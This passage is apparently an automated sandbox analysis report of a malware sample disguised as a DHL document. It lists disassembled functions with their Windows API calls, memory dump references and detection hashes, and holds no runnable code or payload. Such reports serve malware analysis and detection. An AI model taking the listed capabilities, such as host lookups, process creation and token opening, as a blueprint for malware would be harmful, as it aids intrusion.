                                                                                        • Opcode Fuzzy Hash: c01e9455fa6f52207fd69fe45da505f0e0c2692e0246c4d8d065864d76756c1e
                                                                                        • Instruction Fuzzy Hash: 75114872911A21AFCF313F74FC05B5E37989F103A1F10492DF9149A164DF348A41A790
                                                                                        Function 00C76369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C67896,?,?,00000000), ref: 00C05A2C
                                                                                          • Part of subcall function 00C05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C67896,?,?,00000000,?,?), ref: 00C05A50
                                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00C76399
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C763A4
                                                                                        • _memmove.LIBCMT ref: 00C763D1
                                                                                        • inet_ntoa.WSOCK32(?), ref: 00C763DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 1504782959-0
                                                                                        • Opcode ID: fe62b9b14e478327390fcace58e47ef9e3ee0a8ea3fe7c57d39b0c8c083cde37
                                                                                        • Instruction ID: 353680e6b72cbcf96511e93438f5a48cc639f8aee321f69ccc92e2b5f177d979
                                                                                        • Opcode Fuzzy Hash: fe62b9b14e478327390fcace58e47ef9e3ee0a8ea3fe7c57d39b0c8c083cde37
                                                                                        • Instruction Fuzzy Hash: 9B116031A00109AFCB00FBA4DD46DEEB7B8EF05310B148165F505A72A2DB31AE15EB61
                                                                                        Function 00C58B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C58B61
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C58B73
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C58B89
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C58BA4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: d78be7de0a82660e58d46d2b5aa03afda92cabfa288103592b15b00815b47c77
                                                                                        • Instruction ID: 889779435c4c3d2dd9ad8deef7fcb454495acb9592583cfec998e1f4231e299f
                                                                                        • Opcode Fuzzy Hash: d78be7de0a82660e58d46d2b5aa03afda92cabfa288103592b15b00815b47c77
                                                                                        • Instruction Fuzzy Hash: C3115A79900218FFEB10DFA5CC84FADBBB8FB48710F2041A5EA00B7290DA716E55DB94
                                                                                        Function 00C01290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 00C012D8
                                                                                        • GetClientRect.USER32(?,?), ref: 00C3B5FB
                                                                                        • GetCursorPos.USER32(?), ref: 00C3B605
                                                                                        • ScreenToClient.USER32(?,?), ref: 00C3B610
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4127811313-0
                                                                                        • Opcode ID: 83be9a5c6cbdd2a8939a8835cfd3d804f0dfb1f2887a6b325e6766baade90f3f
                                                                                        • Instruction ID: c9a2d78d37c7a8db5f956ebf9cb4b8bff30efe980c1cac1c9c84c4669baf4ce5
                                                                                        • Opcode Fuzzy Hash: 83be9a5c6cbdd2a8939a8835cfd3d804f0dfb1f2887a6b325e6766baade90f3f
                                                                                        • Instruction Fuzzy Hash: 8A113A35910419EFCB00EF98D889AEEB7B8EB05300F440456F911E7280D730BA92DBA9
                                                                                        Function 00C61142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C5FCED,?,00C60D40,?,00008000), ref: 00C6115F
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C5FCED,?,00C60D40,?,00008000), ref: 00C61184
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C5FCED,?,00C60D40,?,00008000), ref: 00C6118E
                                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00C5FCED,?,00C60D40,?,00008000), ref: 00C611C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                        • String ID:
                                                                                        • API String ID: 2875609808-0
                                                                                        • Opcode ID: 5d7cf66fddca5b1af31bd52f0a01ef35e06a0a429f9541cb796b3a5c820dd7fc
                                                                                        • Instruction ID: a1c324fe5f57db34c46d8470224fa82750607b9a5858debdceef57c6d7663c83
                                                                                        • Opcode Fuzzy Hash: 5d7cf66fddca5b1af31bd52f0a01ef35e06a0a429f9541cb796b3a5c820dd7fc
                                                                                        • Instruction Fuzzy Hash: 36113C31D0052DE7CF109FA5D888BEEBB78FF0A712F08445AEE41B2240CB749691CB95
                                                                                        Function 00C5D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C5D84D
                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C5D864
                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C5D879
                                                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C5D897
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                                        • String ID:
                                                                                        • API String ID: 1352324309-0
                                                                                        • Opcode ID: 46fbc05e95bd5cb2eb8ab9507939c882d1f445ab4ac5a00dfc02e8ba7fdb9c51
                                                                                        • Instruction ID: 714752da7af3e5237c21331eef0d89475b0e492b63e114d5b056300559b37eee
                                                                                        • Opcode Fuzzy Hash: 46fbc05e95bd5cb2eb8ab9507939c882d1f445ab4ac5a00dfc02e8ba7fdb9c51
                                                                                        • Instruction Fuzzy Hash: 39115E79605304DBE3308F51EC0CF96BBBCEB40B01F10856DA916D6090D7B0E989DBE5
                                                                                        Function 00C36FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                        • Instruction ID: 659c63065014d6491f8a894b09784ee6d392aae2af0bd8a668a3a282fd5239c7
                                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                        • Instruction Fuzzy Hash: 5A0140B245414ABBCF2A5F84CC45CED3F62BB18350F588615FE2858031D236CAB1BB81
                                                                                        Function 00C8B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00C8B2E4
                                                                                        • ScreenToClient.USER32(?,?), ref: 00C8B2FC
                                                                                        • ScreenToClient.USER32(?,?), ref: 00C8B320
                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C8B33B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 357397906-0
                                                                                        • Opcode ID: c282cb2ec90451ee32ec47790fc25be399ddd26d89da0f8c792af709d3ff0513
                                                                                        • Instruction ID: 73ee0b295d0f00344f87d7d888ace24f4c6806941fa7adef3ec32b467ddca366
                                                                                        • Opcode Fuzzy Hash: c282cb2ec90451ee32ec47790fc25be399ddd26d89da0f8c792af709d3ff0513
                                                                                        • Instruction Fuzzy Hash: D0114675D00209EFDB41DF99C444AEEFBB5FF18310F104166E914E3220D735AA558F54
                                                                                        Function 00C8B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C8B644
                                                                                        • _memset.LIBCMT ref: 00C8B653
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00CC6F20,00CC6F64), ref: 00C8B682
                                                                                        • CloseHandle.KERNEL32 ref: 00C8B694
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3277943733-0
                                                                                        • Opcode ID: a187a63ff3559a4b3bd57d287936019c5dab0c2005d1aee01c2bf4947dd6d993
                                                                                        • Instruction ID: 9b3833f867b7b9a881e7edf69236cbbe2b67c66a7465a01a27999e2ce00949ae
                                                                                        • Opcode Fuzzy Hash: a187a63ff3559a4b3bd57d287936019c5dab0c2005d1aee01c2bf4947dd6d993
                                                                                        • Instruction Fuzzy Hash: EEF05EF25403107AE61027A1FD06FBF3A9CEB08395F004028FA08E51A2D7719C01C7AC
                                                                                        Function 00C66BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00C66BE6
                                                                                          • Part of subcall function 00C676C4: _memset.LIBCMT ref: 00C676F9
                                                                                        • _memmove.LIBCMT ref: 00C66C09
                                                                                        • _memset.LIBCMT ref: 00C66C16
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00C66C26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 48991266-0
                                                                                        • Opcode ID: d1d70402f50e1a9d704afe76dcfe82d02d573c4aa9671d72f4f87a974abaf360
                                                                                        • Instruction ID: 160668234abc4bc245e05e40865848d413e3887afe0a2428fcc51b18ab47f1e9
                                                                                        • Opcode Fuzzy Hash: d1d70402f50e1a9d704afe76dcfe82d02d573c4aa9671d72f4f87a974abaf360
                                                                                        • Instruction Fuzzy Hash: 1CF05E3A200110BBCF016F55EC85B8ABB29EF45320F188065FE085E227D775E811DBB4
                                                                                        Function 00C02218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00C02231
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00C0223B
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00C02250
                                                                                        • GetStockObject.GDI32(00000005), ref: 00C02258
                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00C3BE83
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C3BE90
                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00C3BEA9
                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00C3BEC2
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00C3BEE2
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00C3BEED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1946975507-0
                                                                                        • Opcode ID: 262fb6ada92d9477e1416efbeae5e7c4457e89846378b8166881f8e60ba7d602
                                                                                        • Instruction ID: 903d56e019d085e4cc57dbd21f714a0c045442e25c3a7a6f92dab7af4f3ea080
                                                                                        • Opcode Fuzzy Hash: 262fb6ada92d9477e1416efbeae5e7c4457e89846378b8166881f8e60ba7d602
                                                                                        • Instruction Fuzzy Hash: D8E03932104244EADB215FA8EC4D7DC3B20EB05332F10836AFA79480E187B14A91DB12
                                                                                        Function 00C58712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThread.KERNEL32 ref: 00C5871B
                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C582E6), ref: 00C58722
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C582E6), ref: 00C5872F
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C582E6), ref: 00C58736
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 3974789173-0
                                                                                        • Opcode ID: fe5587900907cfc94426a7e700f332de14fac3d5bd6f633ac1821d37d00c4e36
                                                                                        • Instruction ID: 5f2427693dc8c18bbbfafd008061a1c83b42f4ce441781ee98e26302e2d02c30
                                                                                        • Opcode Fuzzy Hash: fe5587900907cfc94426a7e700f332de14fac3d5bd6f633ac1821d37d00c4e36
                                                                                        • Instruction Fuzzy Hash: 8DE086366113119FD7205FB05D0CB5E3BACEF547D2F24482CB645DA050DB74848AC754
                                                                                        Function 00C5B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00C5B4BE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContainedObject
                                                                                        • String ID: AutoIt3GUI$Container
                                                                                        • API String ID: 3565006973-3941886329
                                                                                        • Opcode ID: 1ce77e3222890373671540e7516e8be303ca80bf89da43a02873645398b6ab6e
                                                                                        • Instruction ID: cf728d597cbebf1a1e2d0a8b5ac763199ac236ed57a2bd5173148680627c78af
                                                                                        • Opcode Fuzzy Hash: 1ce77e3222890373671540e7516e8be303ca80bf89da43a02873645398b6ab6e
                                                                                        • Instruction Fuzzy Hash: A8914874200601AFDB14CF64C884B6ABBE5FF49711F20856DED4ACB6A1EB70ED85CB54
                                                                                        Function 00C6AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C1FC86: _wcscpy.LIBCMT ref: 00C1FCA9
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • __wcsnicmp.LIBCMT ref: 00C6B02D
                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C6B0F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                        • String ID: LPT
                                                                                        • API String ID: 3222508074-1350329615
                                                                                        • Opcode ID: 438281edce62de9963102e7e19b0c3ea6c2df425d9cacd8b3708935ee22b4de3
                                                                                        • Instruction ID: 1bd28589ce3cd772c93e4ebf8e89cdbdd27583e05543086edf544c2e9bc6f471
                                                                                        • Opcode Fuzzy Hash: 438281edce62de9963102e7e19b0c3ea6c2df425d9cacd8b3708935ee22b4de3
                                                                                        • Instruction Fuzzy Hash: 6B6193B5A00219EFCB24DF94C891EAEB7B4EF09310F108169F916EB391D770AE84DB50
                                                                                        Function 00C12957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 00C12968
                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C12981
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        • API String ID: 2783356886-2766056989
                                                                                        • Opcode ID: ba43872546f2d9385e4a85aec51795b4c5e5b2d80664374491e653e5744f8a17
                                                                                        • Instruction ID: c981b0174185c414d012b25c8aeb858f9653b2fd48104da86b97f7aa64a63aef
                                                                                        • Opcode Fuzzy Hash: ba43872546f2d9385e4a85aec51795b4c5e5b2d80664374491e653e5744f8a17
                                                                                        • Instruction Fuzzy Hash: A9515672408B449BD320EF24D886BAFBBE8FF85344F41885DF2D8411A2DB708529DB66
                                                                                        Function 00C69734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C04F0B: __fread_nolock.LIBCMT ref: 00C04F29
                                                                                        • _wcscmp.LIBCMT ref: 00C69824
                                                                                        • _wcscmp.LIBCMT ref: 00C69837
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
